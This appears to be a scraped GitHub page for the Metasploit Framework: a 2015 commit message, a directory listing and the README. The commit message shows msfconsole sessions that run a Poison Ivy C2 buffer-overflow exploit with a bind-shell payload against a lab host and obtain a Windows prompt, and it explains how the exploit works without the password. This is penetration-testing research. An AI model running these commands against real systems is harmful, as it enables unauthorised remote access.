Metasploit Framework
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (the PIVY C2 server password is
set to 'prettysecure' and unknown to the attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
| Path | Last commit | Date |
| --- | --- | --- |
| app | turn nil publics and privates into blanks | 2014-09-05 16:06:58 -05:00 |
| config | Update database.yml.example to ref MSF-DEV | 2015-06-16 11:05:03 -05:00 |
| data | Land #5722, @vallejocc's busybox work | 2015-09-04 13:36:44 -05:00 |
| db | Add polymorphic relationship to Mdm::Vuln | 2015-05-21 13:39:25 -05:00 |
| documentation | Restore the hallowed developer's guide | 2014-12-03 16:50:18 -06:00 |
| external | Replace external source | 2015-08-26 15:32:50 -05:00 |
| features | Capitalized 'Accepted' | 2015-06-16 19:42:32 +01:00 |
| lib | Land #5722, @vallejocc's busybox work | 2015-09-04 13:36:44 -05:00 |
| modules | This is a modification to the original poisonivy_bof.rb exploit | 2015-09-07 17:48:28 +02:00 |
| plugins | Check for a nil header value | 2015-06-02 18:31:48 -04:00 |
| script | rails generate cucumber:install | 2014-08-27 14:10:04 -05:00 |
| scripts | Remove rb from module name | 2015-09-03 09:49:54 +05:00 |
| spec | Land #5722, @vallejocc's busybox work | 2015-09-04 13:36:44 -05:00 |
| test | Another update | 2015-07-29 14:31:35 -05:00 |
| tools | Land #5967, add PACKETSTORM reference types. | 2015-09-01 23:25:26 -05:00 |
| .gitignore | remove android meterpreter bins, update to payloads 1.0.2 | 2015-06-01 09:14:31 -05:00 |
| .gitmodules | Add RDI submodule, port Kitrap0d | 2013-11-27 16:04:41 +10:00 |
| .mailmap | Sorting and adding a couple more -r7 to mailmap | 2015-04-30 12:34:31 -05:00 |
| .rspec | Add modern --require to .rspec | 2014-10-08 10:55:40 -05:00 |
| .rubocop.yml | Reapply PR #4113 (removed via #4175) | 2014-11-11 15:06:43 -06:00 |
| .ruby-gemset | Restoring ruby and gemset files | 2014-05-20 10:17:00 -05:00 |
| .ruby-version | Bump Ruby version to 2.1.6 | 2015-05-07 13:22:59 -05:00 |
| .simplecov | Remove fastlib | 2014-09-18 15:24:21 -05:00 |
| .travis.yml | add libpcap-dev to our travis dependencies | 2015-09-04 17:24:49 -05:00 |
| .yardopts | update .yardopts | 2014-07-24 13:59:04 -05:00 |
| CONTRIBUTING.md | Revert a couple of the suggested edits | 2015-03-30 12:04:15 -05:00 |
| COPYING | Happy new year! | 2014-12-31 12:12:45 -06:00 |
| Gemfile | updating the gemspecs to use the pre-release versions of the other metasploit gems | 2015-04-29 14:07:50 -05:00 |
| Gemfile.local.example | Fix example Gemfile.local to work with existing | 2014-06-24 00:00:47 -05:00 |
| Gemfile.lock | Land #5892, update pcaprub to the latest version | 2015-09-04 17:26:29 -05:00 |
| HACKING | Update link for The Metasploit Development Environment | 2014-07-15 10:16:47 -05:00 |
| LICENSE | Remove LORCON from LICENSE | 2015-02-26 14:53:23 -06:00 |
| README.md | Update README.md | 2015-03-29 01:08:06 -10:00 |
| Rakefile | Merge branch 'feature/MSP-11130/metasploit-framework-spec-constants' into feature/MSP-11147/thread-leak-detection | 2014-11-05 15:47:59 -06:00 |
| metasploit-framework-db.gemspec | locking the r7 managed gems to specific versions | 2015-07-02 14:16:02 -05:00 |
| metasploit-framework-full.gemspec | Make the version constraint a range | 2014-12-19 13:54:13 -06:00 |
| metasploit-framework-pcap.gemspec | Depend on metasloit-framework in optional gemspecs | 2014-11-05 12:33:44 -06:00 |
| metasploit-framework.gemspec | Land #5892, update pcaprub to the latest version | 2015-09-04 17:26:29 -05:00 |
| msfbinscan | Fix -h exit status for Omnibus | 2015-09-04 10:24:49 -05:00 |
| msfconsole | Use Rex::Compat.open_file to open profiling report | 2014-09-19 11:13:28 -05:00 |
| msfd | Remove fastlib | 2014-09-18 15:24:21 -05:00 |
| msfelfscan | Fix -h exit status for Omnibus | 2015-09-04 10:24:49 -05:00 |
| msfmachscan | Fix -h exit status for Omnibus | 2015-09-04 10:24:49 -05:00 |
| msfpescan | Fix -h exit status for Omnibus | 2015-09-04 10:24:49 -05:00 |
| msfrop | Fix -h exit status for Omnibus | 2015-09-04 10:24:49 -05:00 |
| msfrpc | Change {} back to do/end | 2015-03-09 00:00:49 -05:00 |
| msfrpcd | allow overriding the default timeout for a session | 2015-05-01 15:04:55 -05:00 |
| msfupdate | Always use maybe_wait_and_exit in msfupdate | 2013-11-15 17:26:21 -06:00 |
| msfvenom | Lnad #5660, @wchen-r7's warbird check | 2015-07-31 10:25:43 -05:00 |

## README.md


The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://metasploit.com

Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework

New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api

Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

### Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

### Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.

### Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.